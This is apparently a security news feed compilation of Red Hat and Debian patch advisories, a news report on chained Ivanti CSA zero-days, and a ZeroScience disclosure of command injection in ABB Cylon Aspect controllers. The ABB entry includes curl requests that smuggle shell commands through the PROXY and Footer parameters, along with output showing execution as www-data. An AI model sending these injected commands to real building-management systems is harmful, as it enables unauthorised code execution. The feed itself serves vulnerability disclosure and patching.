Red Hat Security Advisory 2024-8103-03 - An update for the python39:3.9 module is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8103.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: python39:3.9 security updateAdvisory ID:        RHSA-2024:8103-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:8103Issue date:         2024-10-15Revision:           03CVE Names:          CVE-2024-6923====================================================================Summary: An update for the python39:3.9 module is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Python is an interpreted, interactive, object-oriented programming language, which includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems.Security Fix(es):* cpython: python: email module doesn't properly quotes newlines in email headers, allowing header injection (CVE-2024-6923)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-6923References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2302255

Red Hat Security Advisory 2024-8103-03

Red Hat Security Advisory 2024-8102-03 - An update for python-gevent is now available for Red Hat Enterprise Linux 8.8 Extended Update Support. Issues addressed include a privilege escalation vulnerability.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8102.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: python-gevent security updateAdvisory ID:        RHSA-2024:8102-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:8102Issue date:         2024-10-15Revision:           03CVE Names:          CVE-2023-41419====================================================================Summary: An update for python-gevent is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:gevent is a coroutine-based Python networking library that uses greenlet to provide a high-level synchronous API on top of libevent event loop.  Features include:    * convenient API around greenlets   * familiar synchronization primitives (gevent.event, gevent.queue)   * socket module that cooperates   * WSGI server on top of libevent-http   * DNS requests done through libevent-dns   * monkey patching utility to get pure Python modules to cooperateSecurity Fix(es):* python-gevent: privilege escalation via a crafted script to the WSGIServer component (CVE-2023-41419)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-41419References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2240651

Red Hat Security Advisory 2024-8102-03

Red Hat Security Advisory 2024-8083-03 - An update for grafana is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8083.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: grafana security updateAdvisory ID:        RHSA-2024:8083-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:8083Issue date:         2024-10-15Revision:           03CVE Names:          CVE-2024-21489====================================================================Summary: An update for grafana is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Grafana is an open source, feature rich metrics dashboard and graph editor for Graphite, InfluxDB & OpenTSDB. Security Fix(es):* uplot: Prototype Pollution in uplot (CVE-2024-21489)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-21489References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2315838

Red Hat Security Advisory 2024-8083-03

Red Hat Security Advisory 2024-8082-03 - An update for.NET 6.0 is now available for Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions, Red Hat Enterprise Linux 8.6 Telecommunications Update Service, and Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8082.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: .NET 6.0 security updateAdvisory ID:        RHSA-2024:8082-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:8082Issue date:         2024-10-15Revision:           03CVE Names:          CVE-2024-43483====================================================================Summary: An update for .NET 6.0 is now available for Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions, Red Hat Enterprise Linux 8.6 Telecommunications Update Service, and Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:.NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation.New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 6.0.135 and .NET Runtime 6.0.1.35.Security Fix(es):* dotnet: Multiple .NET components susceptible to hash flooding (CVE-2024-43483)* dotnet: System.IO.Packaging - Multiple DoS vectors in use of SortedList (CVE-2024-43484)* dotnet: Denial of Service in System.Text.Json (CVE-2024-43485)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Security Fix(es):* dotnet: System.IO.Packaging - Multiple DoS vectors in use of SortedList (CVE-2024-43484)* dotnet: Multiple .NET components susceptible to hash flooding (CVE-2024-43483)* dotnet: Denial of Service in System.Text.Json (CVE-2024-43485)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-43483References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2315729https://bugzilla.redhat.com/show_bug.cgi?id=2315730https://bugzilla.redhat.com/show_bug.cgi?id=2315731

Red Hat Security Advisory 2024-8082-03

Red Hat Security Advisory 2024-8081-03 - An update for OpenIPMI is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8081.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: OpenIPMI security updateAdvisory ID:        RHSA-2024:8081-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:8081Issue date:         2024-10-15Revision:           03CVE Names:          CVE-2024-42934====================================================================Summary: An update for OpenIPMI is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The OpenIPMI packages provide command-line tools and utilities to access platform information using Intelligent Platform Management Interface (IPMI). System administrators can use OpenIPMI to manage systems and to perform system health monitoring.Security Fix(es):* openipmi: missing check on the authorization type on incoming LAN messages in IPMI simulator (CVE-2024-42934)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-42934References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2308375

Red Hat Security Advisory 2024-8081-03

Red Hat Security Advisory 2024-8077-03 - An update is now available for Red Hat JBoss Enterprise Application Platform 7.4 for Red Hat Enterprise Linux 9. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link in the References section. Issues addressed include cross site scripting and denial of service vulnerabilities.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8077.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: Red Hat JBoss Enterprise Application Platform 7.4.19 Security update  
Advisory ID:        RHSA-2024:8077-03  
Product:            Red Hat JBoss Enterprise Application Platform  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:8077  
Issue date:         2024-10-15  
Revision:           03  
CVE Names:          CVE-2022-34169  
====================================================================

Summary: 

An update is now available for Red Hat JBoss Enterprise Application Platform 7.4 for Red Hat Enterprise Linux 9.  
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat JBoss Enterprise Application Platform 7 is a platform for Java applications based on the WildFly application runtime. This release of Red Hat JBoss Enterprise Application Platform 7.4.19 serves as a replacement for Red Hat JBoss Enterprise Application Platform 7.4.18, and includes bug fixes and enhancements. See the Red Hat JBoss Enterprise Application Platform 7.4.19 Release Notes for information about the most significant bug fixes and enhancements included in this release.

Security Fix(es):

* braces: fails to limit the number of characters it can handle [eap-7.4.z] (CVE-2024-4068)

* jose4j: denial of service via specially crafted JWE [eap-7.4.z] (CVE-2023-51775)

* wildfly-domain-http: wildfly: No timeout for EAP management interface may lead to Denial of Service (DoS) [eap-7.4.z] (CVE-2024-4029)

* xalan: integer truncation issue in Xalan-J (JAXP, 8285407) [eap-7.4.z] (CVE-2022-34169)

* org.jsoup/jsoup: The jsoup cleaner may incorrectly sanitize crafted XSS attempts if SafeList.preserveRelativeLinks is enabled [eap-7.4.z] (CVE-2022-36033)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgements, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

CVEs:

CVE-2022-34169

References:

https://access.redhat.com/security/updates/classification/#important  
https://docs.redhat.com/en/documentation/red_hat_jboss_enterprise_application_platform/7.4  
https://docs.redhat.com/en/documentation/red_hat_jboss_enterprise_application_platform/7.4/html-single/installation_guide/index  
https://bugzilla.redhat.com/show_bug.cgi?id=2108554  
https://bugzilla.redhat.com/show_bug.cgi?id=2127078  
https://bugzilla.redhat.com/show_bug.cgi?id=2266921  
https://bugzilla.redhat.com/show_bug.cgi?id=2278615  
https://bugzilla.redhat.com/show_bug.cgi?id=2280600  
https://issues.redhat.com/browse/JBEAP-27051  
https://issues.redhat.com/browse/JBEAP-27357  
https://issues.redhat.com/browse/JBEAP-27548  
https://issues.redhat.com/browse/JBEAP-27613  
https://issues.redhat.com/browse/JBEAP-27658  
https://issues.redhat.com/browse/JBEAP-27700  
https://issues.redhat.com/browse/JBEAP-27701  
https://issues.redhat.com/browse/JBEAP-27713  
https://issues.redhat.com/browse/JBEAP-27714  
https://issues.redhat.com/browse/JBEAP-27715  
https://issues.redhat.com/browse/JBEAP-27746  
https://issues.redhat.com/browse/JBEAP-27747

Red Hat Security Advisory 2024-8077-03

Suspected nation-state actors are spotted stringing together three different zero-days in the Ivanti Cloud Services Application to gain persistent access to a targeted system.

Source: Kristoffer Tripplaar via Alamy Stock Photo

A deft chaining together of three separate zero-day flaws in Ivanti's Cloud Service Appliance allowed a particularly potent cyberattacker to infiltrate a target network and execute malicious actions, leading researchers to conclude a nation-state actor was actively targeting these vulnerable systems.

Fortinet's FortiGuard Labs published its findings, warning that any organization running Ivanti's CSA version 4.6 and prior without taking necessary remediation precautions is vulnerable to this method of attack.

The details of the newly uncovered attack chain come amid the announcement of a bevy of additional security flaws in Ivanti's CSA also under active exploit.

"The advanced adversaries were observed exploiting and chaining zero-day vulnerabilities to establish beachhead access in the victim's network," Fortinet's report said. "This incident is a prime example of how threat actors chain zero-day vulnerabilities to gain initial access to a victim’s network."

The three specific Ivanti CSA flaws used in the attack were a command injection flaw in the DateTimeTab.php resource tracked as CVE-2024-8190, a critical path traversal vulnerability in the /client/index.php resource tracked as CVE-2024-8963, and an unauthenticated command injection vuln tracked as CVE-2024-9380 affecting reports.php.

Once initial access was established using the path traversal bug, the threat group was able to exploit the command injection flaw in the resource reports.php to drop a Web shell. The group exploited a separate SQL injection flaw on Ivanti's backend SQL database server (SQLS) tracked as CVE-2024-29824 to gain remote execution on the SQLS system, the researchers noted.

After Ivanti released a patch for the command injection flaw, the attack group acted to ensure other adversaries do not follow them onto the compromised systems. "On September 10, 2024, when the advisory for CVE-2024-8190 was published by Ivanti, the threat actor, still active in the customer's network, 'patched' the command injection vulnerabilities in the resources /gsb/DateTimeTab.php, and /gsb/reports.php, making them unexploitable," the FortiGuard Labs team added in the report. "In the past, threat actors have been observed to patch vulnerabilities after having exploited them, and gained foothold into the victim's network, to stop any other intruder from gaining access to the vulnerable asset(s), and potentially interfering with their attack operations."

In this instance, analysts suspected the group was trying to use sophisticated techniques to maintain access, including launching a DNS tunneling attack via PowerShell, and dropping a Linux kernel object rootkit on the compromised CSA system.

"The likely motive behind this was for the threat actor to maintain kernel-level persistence on the CSA device, which may survive even a factory reset," Fortinet researchers said.

Serious Adversaries Circle Ivanti CSA Zero-Day Flaws

Debian Linux Security Advisory 5791-1 - Elyas Damej discovered that a sandbox mechanism in ReportLab, a Python library to create PDF documents, could be bypassed which may result in the execution of arbitrary code when converting malformed HTML to a PDF document.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5791-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffOctober 13, 2024                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : python-reportlabCVE ID         : CVE-2023-33733Elyas Damej discovered that a sandbox mechanism in ReportLab, a Pythonlibrary to create PDF documents, could be bypassed which may result inthe execution of arbitrary code when converting malformed HTML to a PDFdocument.For the stable distribution (bookworm), this problem has been fixed inversion 3.6.12-1+deb12u1.We recommend that you upgrade your python-reportlab packages.For the detailed security status of python-reportlab please refer toits security tracker page at:https://security-tracker.debian.org/tracker/python-reportlabFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmcMDm4ACgkQEMKTtsN8Tja2Lw//RW9W1X/NuzRQKUmUf+5jPBY48jOsfoOCjJTEUXSjptjP0m5QA/xsd78b2C4Eq9SooafXXPufiJGbtYs0CP4Xvuok/G1rPkgpcZPYQ2m9Bbcrp6JAMrb/CeAumsuBCQc7IgaCz8AkMh81JxNy5CqVvh9EJdKgZYyviT7wa5Bqyx6TBicfQHdZ8bNk6xQqh0S3+rzkKoau9YE0rYWRZ/AOLki5PUGqsEJOzXFpwn4Ahvk/pBCTra7E/k0oL2bUmVSFtTJcdowtofbh/c9K8ZQmI0k8CMU82LU4cTaV6UjK+498JWpQLl6uq5RISKppR3I5tsk+DVAve4ek1yAyXNrgscm1u62IxSDQpuBc3GgW6cN5nrKYHoALdnjiRD+8OSChTIOpbVSZ4y9tUFU7mHRoVkne4pNohujV/8M1umupJ108nXA34avR+B7DsResI70m19/ocLR5uH1v/rGO4FUrSfAKgOYBR8ryO/YcbDROixyOHFN7vxCUxXF3UPc3uPVuQilHOCi0w+S4JxcLywFXoDIj1qtGlzKA9rtAMA6okHILJKCy43lEo+36nr0WZMZuF7kDQLPkpb1+6zf3Mxwj8QrpRFCT+DYyLfg5MLYLM4Trbavtpk/faXQoP+pLMfjIaq8Nrd7/UOXFQXWFSUh8YwOm99je9zr1Am35zftZnNU==MICC-----END PGP SIGNATURE-----

Debian Security Advisory 5791-1

ABB Cylon Aspect version 3.08.00 suffers from an authenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the PROXY HTTP POST parameter called by the yumSettings.php script.

  
ABB Cylon Aspect 3.08.00 (yumSettings.php) Remote Code Execution

Vendor: ABB Ltd.  
Product web page: https://www.global.abb  
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio  
                  Firmware: <=3.08.00

Summary: ASPECT is an award-winning scalable building energy management  
and control solution designed to allow users seamless access to their  
building data through standard building protocols including smart devices.

Desc: The ABB BMS/BAS controller suffers from an authenticated OS command  
injection vulnerability. This can be exploited to inject and execute arbitrary  
shell commands through the 'PROXY' HTTP POST parameter called by the yumSettings.php  
script.

Tested on: GNU/Linux 3.15.10 (armv7l)  
           GNU/Linux 3.10.0 (x86_64)  
           GNU/Linux 2.6.32 (x86_64)  
           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz  
           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz  
           PHP/7.3.11  
           PHP/5.6.30  
           PHP/5.4.16  
           PHP/4.4.8  
           PHP/5.3.3  
           AspectFT Automation Application Server  
           lighttpd/1.4.32  
           lighttpd/1.4.18  
           Apache/2.2.15 (CentOS)  
           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)  
           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
                            @zeroscience

Advisory ID: ZSL-2024-5841  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5841.php

21.04.2024

--

$ cat project

                 P   R   O   J   E   C   T

                        .|  
                        | |  
                        |'|            ._____  
                ___    |  |            |.   |' .---"|  
        _    .-'   '-. |  |     .--'|  ||   | _|    |  
     .-'|  _.|  |    ||   '-__  |   |  |    ||      |  
     |' | |.    |    ||       | |   |  |    ||      |  
 ____|  '-'     '    ""       '-'   '-.'    '`      |____  
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░    
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
         ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░   
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░   
         ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ 

$ curl -X POST "http://192.168.73.31/yumSettings.php" \  
> -H "Cookie: PHPSESSID=xxx" \  
> -d "CMD=set&PROXY=;id>/tmp/blah"  
Set proxy called - no proxy given:  
$   
$ curl -X POST "http://192.168.73.31/caldavUtil.php" \  
> -d "command=postFooter&Footer=%60cat /tmp/blah%60"  
Set footer to uid=33(www-data) gid=33(www-data) groups=33(www-data):

ABB Cylon Aspect 3.08.00 yumSettings.php Command Injection

Debian Linux Security Advisory 5790-1 - It was discovered that DOMPurify, a sanitizer for HTML, MathML and SVG was susceptible to nesting-based mXSS.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5790-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffOctober 13, 2024                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : node-dompurifyCVE ID         : CVE-2024-47875It was discovered that DOMPurify, a sanitizer for HTML, MathML and SVG wassusceptible to nesting-based mXSS.For the stable distribution (bookworm), this problem has been fixed inversion 2.4.1+dfsg+~2.4.0-2.We recommend that you upgrade your node-dompurify packages.For the detailed security status of node-dompurify please refer toits security tracker page at:https://security-tracker.debian.org/tracker/node-dompurifyFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmcMCGEACgkQEMKTtsN8TjZW5g//Uc2ZeYTX4O8kHZ9IHHL7v9n6pxPG9MLYgiMt11YSs5k6qVT20NvqfWWyN9ZNQkBCtYpKRO3wym5AcfR9UsZxVh3AlT8Q+Y7lHBYxiaQw82ygNQT2nAU32wBSMHnZvjHEAdH/iZWeR2VROVHjwR7bU9cbzc2/dVt1W7WJTLPY8lAqAAJ5D4/6Nlcb1JMwupP1XIW26gSYBGx+RXuKitSr1jKBoraDtAGUtpZQMP7JwKXt+WSLe4mStXwQmQhMkmNd28sonJVAEl/EjvZq1KuEONlj5doPMtMC9eU7HBtXu6b2JoPVyO6FZnx76lMqT+JV9VIqj1MfJofLSv4kT8PfM18KaNHBqtiR370D0q6gxfQxIibvu4WXPmG8CNw/ew4LRwswQMQPSscEGdo8jz3WKhKnLMB6HRWg0m9LMJXQcmNLPiAS8NIcOSDtK8sQC8ODIjR1lYzetnu7Y6o69KWdreFVlHgaWqROfBtxmQ0cf4vBQchZd3cCRsFHtPQ2xsNsbIQoJhst2XzJsNVlgcB78qMiKfc7fsZh7/Uy0oq2jclSA1nWQUoszFblTVCn44fLIS97bn2WggiAqUymBBSyAGeZp//6CuoYik62ARHW5tYXvsa1oq9/d/I5RcBMbNHn2VNyxmzpnkbaFFYS/Sz86ihL17Ao7IOD8ssvaHzGeTw==lKMx-----END PGP SIGNATURE-----

Tag

#linux